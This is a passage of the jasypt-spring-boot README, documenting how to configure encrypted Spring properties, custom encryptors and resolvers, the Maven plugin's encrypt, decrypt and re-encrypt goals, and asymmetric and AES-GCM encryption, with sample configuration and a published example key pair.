IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations, then add this dependency to your project:

```xml
<dependency>
    <groupId>com.github.ulisesbocchio</groupId>
    <artifactId>jasypt-spring-boot</artifactId>
    <version>3.0.5</version>
</dependency>
```

And then add `@EnableEncryptableProperties` to your Configuration class. For instance:

```java
@Configuration
@EnableEncryptableProperties
public class MyApplication {
    ...
}
```

And encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, yaml properties, and any other custom property sources can contain encrypted properties)

3. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations and you don't want to enable encryptable properties across the entire Spring Environment, there's a third option. First add the following dependency to your project:

```xml
<dependency>
    <groupId>com.github.ulisesbocchio</groupId>
    <artifactId>jasypt-spring-boot</artifactId>
    <version>3.0.5</version>
</dependency>
```

And then add as many `@EncryptablePropertySource` annotations as you want in your Configuration files. Just like you do with Spring's `@PropertySource` annotation. For instance:

```java
@Configuration
@EncryptablePropertySource(name = "EncryptedProperties", value = "classpath:encrypted.properties")
public class MyApplication {
    ...
}
```

Conveniently, there's also an `@EncryptablePropertySources` annotation that one could use to group annotations of type `@EncryptablePropertySource` like this:

```java
@Configuration
@EncryptablePropertySources({@EncryptablePropertySource("classpath:encrypted.properties"),
                             @EncryptablePropertySource("classpath:encrypted2.properties")})
public class MyApplication {
    ...
}
```

Also, note that as of version 1.8, `@EncryptablePropertySource` supports YAML files

## Custom Environment

As of version ~~1.7~~ 1.15, a 4th method of enabling encryptable properties exists for some special cases. A custom `ConfigurableEnvironment` class is provided: ~~`EncryptableEnvironment`~~ `StandardEncryptableEnvironment` and `StandardEncryptableServletEnvironment` that can be used with `SpringApplicationBuilder` to define the custom environment this way:

```java
new SpringApplicationBuilder()
    .environment(new StandardEncryptableEnvironment())
    .sources(YourApplicationClass.class).run(args);
```

This method only requires a dependency on `jasypt-spring-boot`. No starter jar dependency is required. This method is useful for early access to encrypted properties during bootstrap. While not required in most scenarios, it could be useful when customizing Spring Boot's init behavior or integrating with certain capabilities that are configured very early, such as Logging configuration. For a concrete example, this method of enabling encryptable properties is the only one that works with Spring Properties replacement in `logback-spring.xml` files, using the `springProperty` tag.
For instance:

```xml
<springProperty name="user" source="db.user"/>
<springProperty name="password" source="db.password"/>
<appender name="db" class="ch.qos.logback.classic.db.DBAppender">
    <connectionSource class="ch.qos.logback.core.db.DriverManagerConnectionSource">
        <driverClass>org.postgresql.Driver</driverClass>
        <url>jdbc:postgresql://localhost:5432/simple</url>
        <user>${user}</user>
        <password>${password}</password>
    </connectionSource>
</appender>
```

This mechanism could be used for instance (as shown) to initialize Database Logging Appenders that require sensitive credentials to be passed. Alternatively, if a custom `StringEncryptor` needs to be provided, a static builder method `StandardEncryptableEnvironment#builder` is provided for customization (other customizations are possible):

```java
StandardEncryptableEnvironment
    .builder()
    .encryptor(new MyEncryptor())
    .build()
```

## How Everything Works

This will trigger some configuration to be loaded that basically does 2 things:

1. It registers a Spring post processor that decorates all PropertySource objects contained in the Spring Environment so they are "encryption aware" and detect when properties are encrypted following jasypt's property convention.
2. It defines a default `StringEncryptor` that can be configured through regular properties, system properties, or command line arguments.

## Where do I put my encrypted properties?

When using METHODS 1 and 2 you can define encrypted properties in any of the PropertySources contained in the Environment. For instance, using the @PropertySource annotation:

```java
@SpringBootApplication
@EnableEncryptableProperties
@PropertySource(name="EncryptedProperties", value = "classpath:encrypted.properties")
public class MyApplication {
    ...
}
```

And your encrypted.properties file would look something like this:

```properties
secret.property=ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+)
```

Now when you do `environment.getProperty("secret.property")` or use `@Value("${secret.property}")` what you get is the decrypted version of `secret.property`.<br/>
When using METHOD 3 (`@EncryptablePropertySource`) you can access the encrypted properties the same way; the only difference is that you must put the properties in the resource that was declared within the `@EncryptablePropertySource` annotation so that the properties can be decrypted properly.

## Password-based Encryption Configuration

Jasypt uses a `StringEncryptor` to decrypt properties.
For all 3 methods, if no custom `StringEncryptor` (see the [Custom Encryptor](#customEncryptor) section for details) is found in the Spring Context, one is created automatically that can be configured through the following properties (System, properties file, command line arguments, environment variable, etc.):

<table border="1">
<tr>
    <td>Key</td><td>Required</td><td>Default Value</td>
</tr>
<tr>
    <td>jasypt.encryptor.password</td><td><b>True</b></td><td> - </td>
</tr>
<tr>
    <td>jasypt.encryptor.algorithm</td><td>False</td><td>PBEWITHHMACSHA512ANDAES_256</td>
</tr>
<tr>
    <td>jasypt.encryptor.key-obtention-iterations</td><td>False</td><td>1000</td>
</tr>
<tr>
    <td>jasypt.encryptor.pool-size</td><td>False</td><td>1</td>
</tr>
<tr>
    <td>jasypt.encryptor.provider-name</td><td>False</td><td>SunJCE</td>
</tr>
<tr>
    <td>jasypt.encryptor.provider-class-name</td><td>False</td><td>null</td>
</tr>
<tr>
    <td>jasypt.encryptor.salt-generator-classname</td><td>False</td><td>org.jasypt.salt.RandomSaltGenerator</td>
</tr>
<tr>
    <td>jasypt.encryptor.iv-generator-classname</td><td>False</td><td>org.jasypt.iv.RandomIvGenerator</td>
</tr>
<tr>
    <td>jasypt.encryptor.string-output-type</td><td>False</td><td>base64</td>
</tr>
<tr>
    <td>jasypt.encryptor.proxy-property-sources</td><td>False</td><td>false</td>
</tr>
<tr>
    <td>jasypt.encryptor.skip-property-sources</td><td>False</td><td>empty list</td>
</tr>
</table>

The only required property is the encryption password; the rest can be left to their default values. While all these properties could be declared in a properties file, the encryptor password should not be stored in a property file; it should rather be passed as a system property, command line argument, or environment variable, and as long as its name is `jasypt.encryptor.password` it'll work.<br/>

The last property, `jasypt.encryptor.proxyPropertySources`, is used to indicate to `jasypt-spring-boot` how property values are going to be intercepted for decryption. The default value, `false`, uses custom wrapper implementations of `PropertySource`, `EnumerablePropertySource`, and `MapPropertySource`. When `true` is specified for this property, the interception mechanism will use CGLib proxies on each specific `PropertySource` implementation. This may be useful in some scenarios where the type of the original `PropertySource` must be preserved.

## <a name="customEncryptor"></a>Use your own Custom Encryptor

For custom configuration of the encryptor and the source of the encryptor password you can always define your own StringEncryptor bean in your Spring Context, and the default encryptor will be ignored. For instance:

```java
@Bean("jasyptStringEncryptor")
public StringEncryptor stringEncryptor() {
    PooledPBEStringEncryptor encryptor = new PooledPBEStringEncryptor();
    SimpleStringPBEConfig config = new SimpleStringPBEConfig();
    config.setPassword("password");
    config.setAlgorithm("PBEWITHHMACSHA512ANDAES_256");
    config.setKeyObtentionIterations("1000");
    config.setPoolSize("1");
    config.setProviderName("SunJCE");
    config.setSaltGeneratorClassName("org.jasypt.salt.RandomSaltGenerator");
    config.setIvGeneratorClassName("org.jasypt.iv.RandomIvGenerator");
    config.setStringOutputType("base64");
    encryptor.setConfig(config);
    return encryptor;
}
```

Notice that the bean name is required, as `jasypt-spring-boot` detects custom String Encryptors by name as of version `1.5`.
The default bean name is:

```
jasyptStringEncryptor
```

But one can also override this by defining the property:

```
jasypt.encryptor.bean
```

So for instance, if you define `jasypt.encryptor.bean=encryptorBean` then you would define your custom encryptor with that name:

```java
@Bean("encryptorBean")
public StringEncryptor stringEncryptor() {
    ...
}
```

## Custom Property Detector, Prefix, Suffix and/or Resolver

As of `jasypt-spring-boot-1.10` there are new extension points. `EncryptablePropertySource` now uses `EncryptablePropertyResolver` to resolve all properties:

```java
public interface EncryptablePropertyResolver {
    String resolvePropertyValue(String value);
}
```

Implementations of this interface are responsible for both **detecting** and **decrypting** properties. The default implementation, `DefaultPropertyResolver`, uses the aforementioned `StringEncryptor` and a new `EncryptablePropertyDetector`.

### Provide a Custom `EncryptablePropertyDetector`

You can override the default implementation by providing a Bean of type `EncryptablePropertyDetector` with name `encryptablePropertyDetector`, or if you want to provide your own bean name, override the property `jasypt.encryptor.property.detector-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for detecting encrypted properties. Example:

```java
private static class MyEncryptablePropertyDetector implements EncryptablePropertyDetector {
    @Override
    public boolean isEncrypted(String value) {
        if (value != null) {
            return value.startsWith("ENC@");
        }
        return false;
    }

    @Override
    public String unwrapEncryptedValue(String value) {
        return value.substring("ENC@".length());
    }
}
```

```java
@Bean(name = "encryptablePropertyDetector")
public EncryptablePropertyDetector encryptablePropertyDetector() {
    return new MyEncryptablePropertyDetector();
}
```

### Provide a Custom Encrypted Property `prefix` and `suffix`

If all you want to do is to have a different prefix/suffix for encrypted properties, you can keep using all the default implementations and just override the following properties in `application.properties` (or `application.yml`):

```YAML
jasypt:
  encryptor:
    property:
      prefix: "ENC@["
      suffix: "]"
```

### Provide a Custom `EncryptablePropertyResolver`

You can override the default implementation by providing a Bean of type `EncryptablePropertyResolver` with name `encryptablePropertyResolver`, or if you want to provide your own bean name, override the property `jasypt.encryptor.property.resolver-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for detecting and decrypting encrypted properties.
Example:

```java
class MyEncryptablePropertyResolver implements EncryptablePropertyResolver {

    private final PooledPBEStringEncryptor encryptor;

    public MyEncryptablePropertyResolver(char[] password) {
        this.encryptor = new PooledPBEStringEncryptor();
        SimpleStringPBEConfig config = new SimpleStringPBEConfig();
        config.setPasswordCharArray(password);
        config.setAlgorithm("PBEWITHHMACSHA512ANDAES_256");
        config.setKeyObtentionIterations("1000");
        config.setPoolSize(1);
        config.setProviderName("SunJCE");
        config.setSaltGeneratorClassName("org.jasypt.salt.RandomSaltGenerator");
        config.setIvGeneratorClassName("org.jasypt.iv.RandomIvGenerator");
        config.setStringOutputType("base64");
        encryptor.setConfig(config);
    }

    @Override
    public String resolvePropertyValue(String value) {
        if (value != null && value.startsWith("{cipher}")) {
            return encryptor.decrypt(value.substring("{cipher}".length()));
        }
        return value;
    }
}
```

```java
@Bean(name="encryptablePropertyResolver")
EncryptablePropertyResolver encryptablePropertyResolver(@Value("${jasypt.encryptor.password}") String password) {
    return new MyEncryptablePropertyResolver(password.toCharArray());
}
```

Notice that by overriding `EncryptablePropertyResolver`, any other configuration or overrides you may have for prefixes, suffixes, `EncryptablePropertyDetector` and `StringEncryptor` will stop working, since the Default resolver is what uses them. You'd have to wire all that stuff yourself. Fortunately, you don't have to override this bean in most cases; the previous options should suffice. But as you can see in the implementation, the detection and decryption of the encrypted properties are internal to `MyEncryptablePropertyResolver`

## Using Filters

`jasypt-spring-boot:2.1.0` introduces a new feature to specify property filters. The filter is part of the `EncryptablePropertyResolver` API and allows you to determine which properties or property sources to consider for decryption. That is, before even examining the actual property value to search for, or try to, decrypt it. For instance, by default, all properties whose name starts with `jasypt.encryptor` are excluded from examination. This is to avoid circular dependencies at load time when the library beans are configured.

### DefaultPropertyFilter properties

By default, the `DefaultPropertyResolver` uses `DefaultPropertyFilter`, which allows you to specify the following string pattern lists:

* jasypt.encryptor.property.filter.include-sources: Specify the property sources name patterns to be included for decryption
* jasypt.encryptor.property.filter.exclude-sources: Specify the property sources name patterns to be EXCLUDED for decryption
* jasypt.encryptor.property.filter.include-names: Specify the property name patterns to be included for decryption
* jasypt.encryptor.property.filter.exclude-names: Specify the property name patterns to be EXCLUDED for decryption

### Provide a custom `EncryptablePropertyFilter`

You can override the default implementation by providing a Bean of type `EncryptablePropertyFilter` with name `encryptablePropertyFilter`, or if you want to provide your own bean name, override the property `jasypt.encryptor.property.filter-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for detecting properties and/or property sources you want to consider for decryption.
Example:

```java
class MyEncryptablePropertyFilter implements EncryptablePropertyFilter {

    @Override
    public boolean shouldInclude(PropertySource<?> source, String name) {
        return name.startsWith("encrypted.");
    }
}
```

```java
@Bean(name="encryptablePropertyFilter")
EncryptablePropertyFilter encryptablePropertyFilter() {
    return new MyEncryptablePropertyFilter();
}
```

Notice that for this mechanism to work, you should not provide a custom `EncryptablePropertyResolver` and use the default resolver instead. If you provide a custom resolver, you are responsible for the entire process of detecting and decrypting properties.

## Filter out `PropertySource` classes from being introspected

Define a comma-separated list of fully-qualified class names to be skipped from introspection. These classes will not be wrapped/proxied by this plugin, and thereby properties contained in them won't support encryption/decryption:

```properties
jasypt.encryptor.skip-property-sources=org.springframework.boot.env.RandomValuePropertySource,org.springframework.boot.ansi.AnsiPropertySource
```

## Encryptable Properties cache refresh

Encrypted properties are cached within your application, and in certain scenarios, like when using externalized configuration from a config server, the properties need to be refreshed when they change. For this, `jasypt-spring-boot` registers a `RefreshScopeRefreshedEventListener` that listens to the following events by default to clear the encrypted properties cache:

```java
public static final List<String> EVENT_CLASS_NAMES = Arrays.asList(
        "org.springframework.cloud.context.scope.refresh.RefreshScopeRefreshedEvent",
        "org.springframework.cloud.context.environment.EnvironmentChangeEvent",
        "org.springframework.boot.web.servlet.context.ServletWebServerInitializedEvent"
);
```

Should you need to register extra events that you would like to trigger an encrypted cache invalidation, you can add them using the following property (separated by commas if more than one is needed):

```properties
jasypt.encryptor.refreshed-event-classes=org.springframework.boot.context.event.ApplicationStartedEvent
```

## Maven Plugin

A Maven plugin is provided with a number of helpful utilities. To use the plugin, just add the following to your pom.xml:

```xml
<build>
  <plugins>
    <plugin>
      <groupId>com.github.ulisesbocchio</groupId>
      <artifactId>jasypt-maven-plugin</artifactId>
      <version>3.0.5</version>
    </plugin>
  </plugins>
</build>
```

When using this plugin, the easiest way to provide your encryption password is via a system property, i.e. -Djasypt.encryptor.password="the password". By default, the plugin will consider encryption configuration in standard Spring Boot configuration files under ./src/main/resources. You can also use system properties or environment variables to supply this configuration. Keep in mind that the rest of your application code and resources are not available to the plugin because Maven plugins do not share a classpath with projects. If your application provides encryption configuration via a StringEncryptor bean then this will not be picked up. In general, it is recommended to just rely on the secure default configuration.

### Encryption

To encrypt a single value run:

```bash
mvn jasypt:encrypt-value -Djasypt.encryptor.password="the password" -Djasypt.plugin.value="theValueYouWantToEncrypt"
```

To encrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `DEC(...)`.
For example: ```properties sensitive.password=DEC(secret value) regular.property=example ``` Then run: ```bash mvn jasypt:encrypt -Djasypt.encryptor.password="the password" ``` Which would edit that file in place resulting in: ```properties sensitive.password=ENC(encrypted) regular.property=example ``` The file name and location can be customised. ### Decryption To decrypt a single value run: ```bash mvn jasypt:decrypt-value -Djasypt.encryptor.password="the password" -Djasypt.plugin.value="DbG1GppXOsFa2G69PnmADvQFI3esceEhJYbaEIKCcEO5C85JEqGAhfcjFMGnoRFf" ``` To decrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `ENC(...)`. For example: ```properties sensitive.password=ENC(encrypted) regular.property=example ``` This can be decrypted as follows: ```bash mvn jasypt:decrypt -Djasypt.encryptor.password="the password" ``` Which would output the decrypted contents to the screen: ```properties sensitive.password=DEC(decrypted) regular.property=example ``` Note that outputting to the screen, rather than editing the file in place, is designed to reduce accidental committing of decrypted values to version control. When decrypting, you most likely just want to check what value has been encrypted, rather than wanting to permanently decrypt that value. ### Re-encryption Changing the configuration for existing encrypted properties is slightly awkward using the encrypt/decrypt goals. You must run the decrypt goal using the old configuration, then copy the decrypted output back into the original file, then run the encrypt goal with the new configuration. The re-encrypt goal simplifies this by re-encrypting a file in place. 2 sets of configuration must be provided. The new configuration is supplied in the same way as you would configure the other maven goals. The old configuration is supplied via system properties prefixed with "jasypt.plugin.old" instead of "jasypt.encryptor". For example, to re-encrypt application.properties that was previously encrypted with the password OLD and then encrypt with the new password NEW: ```bash mvn jasypt:reencrypt -Djasypt.plugin.old.password=OLD -Djasypt.encryptor.password=NEW ``` *Note: All old configuration must be passed as system properties. Environment variables and Spring Boot configuration files are not supported.* ### Upgrade Sometimes the default encryption configuration might change between versions of jasypt-spring-boot. You can automatically upgrade your encrypted properties to the new defaults with the upgrade goal. This will decrypt your application.properties file using the old default configuration and re-encrypt using the new default configuration. ```bash mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE ``` You can also pass the system property `-Djasypt.plugin.old.major-version` to specify the version you are upgrading from. This will always default to the last major version where the configuration changed. Currently, the only major version where the defaults changed is version 2, so there is no need to set this property, but it is there for future use. ### Load You can also decrypt a properties file and load all of its properties into memory and make them accessible to Maven. This is useful when you want to make encrypted properties available to other Maven plugins. You can chain the goals of the later plugins directly after this one. 
For example, with flyway:

```bash
mvn jasypt:load flyway:migrate -Djasypt.encryptor.password="the password"
```

You can also specify a prefix for each property with `-Djasypt.plugin.keyPrefix=example.`. This helps to avoid potential clashes with other Maven properties.

### Changing the file path

For all the above utilities, the path of the file you are encrypting/decrypting defaults to `file:src/main/resources/application.properties`. This can be changed using the `-Djasypt.plugin.path` system property.

You can encrypt a file in your test resources directory:

```bash
mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/test/application.properties" -Djasypt.encryptor.password="the password"
```

Or with a different name:

```bash
mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/resources/flyway.properties" -Djasypt.encryptor.password="the password"
```

Or with a different file type (the plugin supports any plain text file format including YAML):

```bash
mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/resources/application.yaml" -Djasypt.encryptor.password="the password"
```

**Note that the load goal only supports .property files**

### Spring profiles and other spring config

You can override any Spring config you support in your application when running the plugin, for instance selecting a given Spring profile:

```bash
mvn jasypt:encrypt -Dspring.profiles.active=cloud -Djasypt.encryptor.password="the password"
```

### Multi-module maven projects

To encrypt/decrypt properties in multi-module projects, disable recursion with `-N` or `--non-recursive` on the Maven command:

```bash
mvn jasypt:upgrade -Djasypt.plugin.path=file:server/src/test/resources/application-test.properties -Djasypt.encryptor.password=supersecret -N
```

## Asymmetric Encryption

`jasypt-spring-boot:2.1.1` introduces a new feature to encrypt/decrypt properties using asymmetric encryption with a pair of private/public keys in DER or PEM formats.

### Config Properties

The following are the configuration properties you can use to configure asymmetric decryption of properties:

<table border="1">
<tr>
    <td>Key</td><td>Default Value</td><td>Description</td>
</tr>
<tr>
    <td>jasypt.encryptor.privateKeyString</td><td>null</td><td>private key for decryption in String format</td>
</tr>
<tr>
    <td>jasypt.encryptor.privateKeyLocation</td><td>null</td><td>location of the private key for decryption in spring resource format</td>
</tr>
<tr>
    <td>jasypt.encryptor.privateKeyFormat</td><td>DER</td><td>Key format. DER or PEM</td>
</tr>
</table>

You should either use `privateKeyString` or `privateKeyLocation`; the String format takes precedence if set. To specify a private key in DER format with `privateKeyString`, please encode the key bytes to `base64`.

__Note__ that `jasypt.encryptor.password` still takes precedence for PBE encryption over the asymmetric config.
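The documentation doesn't show how to produce a key pair in the expected formats. Judging by the samples that follow (a `BEGIN PRIVATE KEY` PEM block and an X.509 public key in the encryption snippet), the expected material appears to be an RSA private key in PKCS#8 form; assuming that, a plain-JDK sketch to generate the DER files and the base64 `privateKeyString` value would be:

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Base64;

public class GenerateKeyPair {
    public static void main(String[] args) throws Exception {
        // 2048-bit RSA key pair; getEncoded() yields PKCS#8 (private)
        // and X.509/SPKI (public) DER bytes out of the box
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
        generator.initialize(2048);
        KeyPair pair = generator.generateKeyPair();

        // DER files usable via jasypt.encryptor.privateKeyLocation
        Files.write(Path.of("private_key.der"), pair.getPrivate().getEncoded());
        Files.write(Path.of("public_key.der"), pair.getPublic().getEncoded());

        // Base64 of the same private-key bytes can be pasted into
        // jasypt.encryptor.privateKeyString
        System.out.println(Base64.getEncoder().encodeToString(pair.getPrivate().getEncoded()));
    }
}
```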
### Sample config #### DER key as string ```yaml jasypt: encryptor: privateKeyString: MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYMZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+LIQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1iG9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpAuAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMUvcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQaNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLIDYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKBV/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPazXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXuPmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPkbPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJDiy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRffumowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kIohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIBt3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSard+dewfKoPnWw0WyGFEWCg== ``` #### DER key as a resource location ```yaml jasypt: encryptor: privateKeyLocation: classpath:private_key.der ``` #### PEM key as string ```yaml jasypt: encryptor: privateKeyFormat: PEM privateKeyString: |- -----BEGIN PRIVATE KEY----- MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYM ZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+L IQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39 orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1i G9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpA uAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr 2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMU vcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54 kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQ aNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLI DYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKB V/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPa zXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXu PmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPk bPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO 5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJ Diy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRff umowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kI ohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3 UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584 JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/ jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIB t3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1 Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0 
lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSa rd+dewfKoPnWw0WyGFEWCg== -----END PRIVATE KEY----- ``` #### PEM key as a resource location ```yaml jasypt: encryptor: privateKeyFormat: PEM privateKeyLocation: classpath:private_key.pem ``` ### Encrypting properties There is no program/command to encrypt properties using asymmetric keys but you can use the following code snippet to encrypt your properties: #### DER Format ```java import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; import org.jasypt.encryption.StringEncryptor; public class PropertyEncryptor { public static void main(String[] args) { SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); config.setPublicKey("MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGPVNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GBnIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBUFcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKsnu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pqIVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBgkQIDAQAB"); StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); String message = "chupacabras"; String encrypted = encryptor.encrypt(message); System.out.printf("Encrypted message %s\n", encrypted); } } ``` #### PEM Format ```java import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; import org.jasypt.encryption.StringEncryptor; import static com.ulisesbocchio.jasyptspringboot.util.AsymmetricCryptography.KeyFormat.PEM; public class PropertyEncryptor { public static void main(String[] args) { SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); config.setKeyFormat(PEM); config.setPublicKey("-----BEGIN PUBLIC KEY-----\n" + "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGP\n" + "VNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GB\n" + "nIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBU\n" + "FcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKs\n" + "nu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pq\n" + "IVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBg\n" + "kQIDAQAB\n" + "-----END PUBLIC KEY-----\n"); StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); String message = "chupacabras"; String encrypted = encryptor.encrypt(message); System.out.printf("Encrypted message %s\n", encrypted); } } ``` ## AES 256-GCM Encryption As of version 3.0.5, AES 256-GCM Encryption is supported. To use this type of encryption, set the property `jasypt.encryptor.gcm-secret-key-string`, `jasypt.encryptor.gcm-secret-key-location` or `jasypt.encryptor.gcm-secret-key-password`. </br> The underlying algorithm used is `AES/GCM/NoPadding` so make sure that's installed in your JDK.<br/> The `SimpleGCMByteEncryptor` uses a `IVGenerator` to encrypt properties. You can configure that with property `jasypt.encryptor.iv-generator-classname` if you don't want to use the default implementation `RandomIvGenerator` ### Using a key When using a key via `jasypt.encryptor.gcm-secret-key-string` or `jasypt.encryptor.gcm-secret-key-location`, make sure you encode your key in base64. 
The base64 string value can be set to `jasypt.encryptor.gcm-secret-key-string`, or you can save it in a file and use a Spring resource locator pointing to that file in the property `jasypt.encryptor.gcm-secret-key-location`. For instance:

```properties
